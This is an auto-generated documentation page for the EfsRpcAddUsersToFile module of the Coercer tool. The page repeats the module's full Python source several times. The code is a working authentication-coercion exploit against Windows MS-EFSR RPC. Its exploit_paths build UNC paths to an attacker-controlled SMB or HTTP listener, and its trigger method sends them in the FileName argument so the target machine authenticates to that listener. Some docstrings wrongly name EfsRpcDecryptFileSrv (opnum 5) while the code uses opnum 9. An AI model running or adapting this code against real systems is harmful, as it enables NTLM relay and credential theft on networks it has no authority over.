coercer.methods.MS_EFSR.EfsRpcAddUsersToFile

  1#!/usr/bin/env python3
  2# -*- coding: utf-8 -*-
  3# File name          : EfsRpcAddUsersToFile.py
  4# Author             : XiaoliChan
  5# Date created       : 18 Mar 2023
  6
  7
  8from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
  9from coercer.network.DCERPCSessionError import DCERPCSessionError
 10from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
 11from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID
 12
 13class EFS_HASH_BLOB(NDRSTRUCT):
 14    structure = (
 15        ('Data', DWORD),
 16        ('cbData', PCHAR),
 17    )
 18
 19class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT):
 20    structure = (
 21        ('Lenght', DWORD),
 22        ('SID', RPC_SID),
 23        ('Hash', EFS_HASH_BLOB),
 24        ('Display', LPWSTR),
 25    )  
 26
 27class ENCRYPTION_CERTIFICATE_LIST(NDRSTRUCT):
 28    structure = (
 29        ('nUsers', DWORD),
 30        ('Users', ENCRYPTION_CERTIFICATE_HASH),
 31    )
 32
 33class _EfsRpcAddUsersToFile(NDRCALL):
 34    """
 35    Structure to make the RPC call to EfsRpcAddUsersToFile() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/afd56d24-3732-4477-b5cf-44cc33848d85)
 36    """
 37    opnum = 9
 38    structure = (
 39        ('FileName', WSTR),   # Type: wchar_t *
 40        ('EncryptionCertificates', ENCRYPTION_CERTIFICATE_LIST)
 41    )
 42
 43class _EfsRpcAddUsersToFileResponse(NDRCALL):
 44    """
 45    Structure to parse the response of the RPC call to EfsRpcDecryptFileSrv() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)
 46    """
 47    structure = ()
 48
 49
 50class EfsRpcAddUsersToFile(MSPROTOCOLRPCCALL):
 51    """
 52    Coercing a machine to authenticate using function EfsRpcDecryptFileSrv (opnum 5) of [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)
 53
 54    Method found by:
 55     - [@topotam77](https://twitter.com/topotam77)
 56    """
 57
 58    exploit_paths = [
 59        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
 60        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
 61        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
 62        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
 63    ]
 64
 65    access = {
 66        "ncan_np": [
 67            {
 68                "namedpipe": r"\PIPE\efsrpc",
 69                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
 70                "version": "1.0"
 71            },
 72            {
 73                "namedpipe": r"\PIPE\lsarpc",
 74                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 75                "version": "1.0"
 76            },
 77            {
 78                "namedpipe": r"\PIPE\samr",
 79                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 80                "version": "1.0"
 81            },
 82            {
 83                "namedpipe": r"\PIPE\lsass",
 84                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 85                "version": "1.0"
 86            },
 87            {
 88                "namedpipe": r"\PIPE\netlogon",
 89                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 90                "version": "1.0"
 91            },
 92        ],
 93        "ncacn_ip_tcp": [
 94            {
 95                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
 96                "version": "1.0"
 97            },
 98            {
 99                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
100                "version": "1.0"
101            }
102        ]
103    }
104
105    protocol = {
106        "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol",
107        "shortname": "MS-EFSR"
108    }
109
110    function = {
111        "name": "EfsRpcAddUsersToFile",
112        "opnum": 9,
113        "vulnerable_arguments": ["FileName"]
114    }
115
116    def trigger(self, dcerpc_session, target):
117        if dcerpc_session is not None:
118            try:
119                request = _EfsRpcAddUsersToFile()
120                request['FileName'] = self.path
121                resp = dcerpc_session.request(request)
122                return ""
123            except Exception as err:
124                return err
125        else:
126            print("[!] Error: dce is None, you must call connect() first.")
127            return None
class EFS_HASH_BLOB(impacket.dcerpc.v5.ndr.NDRSTRUCT):
14class EFS_HASH_BLOB(NDRSTRUCT):
15    structure = (
16        ('Data', DWORD),
17        ('cbData', PCHAR),
18    )

This will be the base class for all DCERPC NDR Types and represents a NDR Primitive Type

structure = (('Data', <class 'impacket.dcerpc.v5.ndr.NDRULONG'>), ('cbData', <class 'impacket.dcerpc.v5.dtypes.PCHAR'>))
Inherited Members
impacket.dcerpc.v5.ndr.NDR
NDR
referent
commonHdr
commonHdr64
structure64
align
item
fields
changeTransferSyntax
getDataLen
isNDR
dumpRaw
dump
calculatePad
pack
unpack
impacket.dcerpc.v5.ndr.NDRSTRUCT
getData
fromString
getAlignment
impacket.dcerpc.v5.ndr.NDRCONSTRUCTEDTYPE
isPointer
isUnion
getDataReferents
getDataReferent
calcPackSize
getArrayMaximumSize
getArraySize
fromStringReferents
fromStringReferent
calcUnPackSize
class ENCRYPTION_CERTIFICATE_HASH(impacket.dcerpc.v5.ndr.NDRSTRUCT):
20class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT):
21    structure = (
22        ('Lenght', DWORD),
23        ('SID', RPC_SID),
24        ('Hash', EFS_HASH_BLOB),
25        ('Display', LPWSTR),
26    )  

This will be the base class for all DCERPC NDR Types and represents a NDR Primitive Type

structure = (('Lenght', <class 'impacket.dcerpc.v5.ndr.NDRULONG'>), ('SID', <class 'impacket.dcerpc.v5.dtypes.RPC_SID'>), ('Hash', <class 'EFS_HASH_BLOB'>), ('Display', <class 'impacket.dcerpc.v5.dtypes.LPWSTR'>))
Inherited Members
impacket.dcerpc.v5.ndr.NDR
NDR
referent
commonHdr
commonHdr64
structure64
align
item
fields
changeTransferSyntax
getDataLen
isNDR
dumpRaw
dump
calculatePad
pack
unpack
impacket.dcerpc.v5.ndr.NDRSTRUCT
getData
fromString
getAlignment
impacket.dcerpc.v5.ndr.NDRCONSTRUCTEDTYPE
isPointer
isUnion
getDataReferents
getDataReferent
calcPackSize
getArrayMaximumSize
getArraySize
fromStringReferents
fromStringReferent
calcUnPackSize
class ENCRYPTION_CERTIFICATE_LIST(impacket.dcerpc.v5.ndr.NDRSTRUCT):
28class ENCRYPTION_CERTIFICATE_LIST(NDRSTRUCT):
29    structure = (
30        ('nUsers', DWORD),
31        ('Users', ENCRYPTION_CERTIFICATE_HASH),
32    )

This will be the base class for all DCERPC NDR Types and represents a NDR Primitive Type

structure = (('nUsers', <class 'impacket.dcerpc.v5.ndr.NDRULONG'>), ('Users', <class 'ENCRYPTION_CERTIFICATE_HASH'>))
Inherited Members
impacket.dcerpc.v5.ndr.NDR
NDR
referent
commonHdr
commonHdr64
structure64
align
item
fields
changeTransferSyntax
getDataLen
isNDR
dumpRaw
dump
calculatePad
pack
unpack
impacket.dcerpc.v5.ndr.NDRSTRUCT
getData
fromString
getAlignment
impacket.dcerpc.v5.ndr.NDRCONSTRUCTEDTYPE
isPointer
isUnion
getDataReferents
getDataReferent
calcPackSize
getArrayMaximumSize
getArraySize
fromStringReferents
fromStringReferent
calcUnPackSize
class EfsRpcAddUsersToFile(coercer.models.MSPROTOCOLRPCCALL.MSPROTOCOLRPCCALL):
 51class EfsRpcAddUsersToFile(MSPROTOCOLRPCCALL):
 52    """
 53    Coercing a machine to authenticate using function EfsRpcDecryptFileSrv (opnum 5) of [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)
 54
 55    Method found by:
 56     - [@topotam77](https://twitter.com/topotam77)
 57    """
 58
 59    exploit_paths = [
 60        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
 61        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
 62        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
 63        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
 64    ]
 65
 66    access = {
 67        "ncan_np": [
 68            {
 69                "namedpipe": r"\PIPE\efsrpc",
 70                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
 71                "version": "1.0"
 72            },
 73            {
 74                "namedpipe": r"\PIPE\lsarpc",
 75                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 76                "version": "1.0"
 77            },
 78            {
 79                "namedpipe": r"\PIPE\samr",
 80                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 81                "version": "1.0"
 82            },
 83            {
 84                "namedpipe": r"\PIPE\lsass",
 85                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 86                "version": "1.0"
 87            },
 88            {
 89                "namedpipe": r"\PIPE\netlogon",
 90                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 91                "version": "1.0"
 92            },
 93        ],
 94        "ncacn_ip_tcp": [
 95            {
 96                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
 97                "version": "1.0"
 98            },
 99            {
100                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
101                "version": "1.0"
102            }
103        ]
104    }
105
106    protocol = {
107        "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol",
108        "shortname": "MS-EFSR"
109    }
110
111    function = {
112        "name": "EfsRpcAddUsersToFile",
113        "opnum": 9,
114        "vulnerable_arguments": ["FileName"]
115    }
116
117    def trigger(self, dcerpc_session, target):
118        if dcerpc_session is not None:
119            try:
120                request = _EfsRpcAddUsersToFile()
121                request['FileName'] = self.path
122                resp = dcerpc_session.request(request)
123                return ""
124            except Exception as err:
125                return err
126        else:
127            print("[!] Error: dce is None, you must call connect() first.")
128            return None

Coercing a machine to authenticate using function EfsRpcDecryptFileSrv (opnum 5) of MS-EFSR Protocol

Method found by:

exploit_paths = [('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), ('http', '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00')]
access = {'ncan_np': [{'namedpipe': '\\PIPE\\efsrpc', 'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsarpc', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\samr', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsass', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\netlogon', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}], 'ncacn_ip_tcp': [{'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}]}
protocol = {'longname': '[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol', 'shortname': 'MS-EFSR'}
function = {'name': 'EfsRpcAddUsersToFile', 'opnum': 9, 'vulnerable_arguments': ['FileName']}
def trigger(self, dcerpc_session, target):
117    def trigger(self, dcerpc_session, target):
118        if dcerpc_session is not None:
119            try:
120                request = _EfsRpcAddUsersToFile()
121                request['FileName'] = self.path
122                resp = dcerpc_session.request(request)
123                return ""
124            except Exception as err:
125                return err
126        else:
127            print("[!] Error: dce is None, you must call connect() first.")
128            return None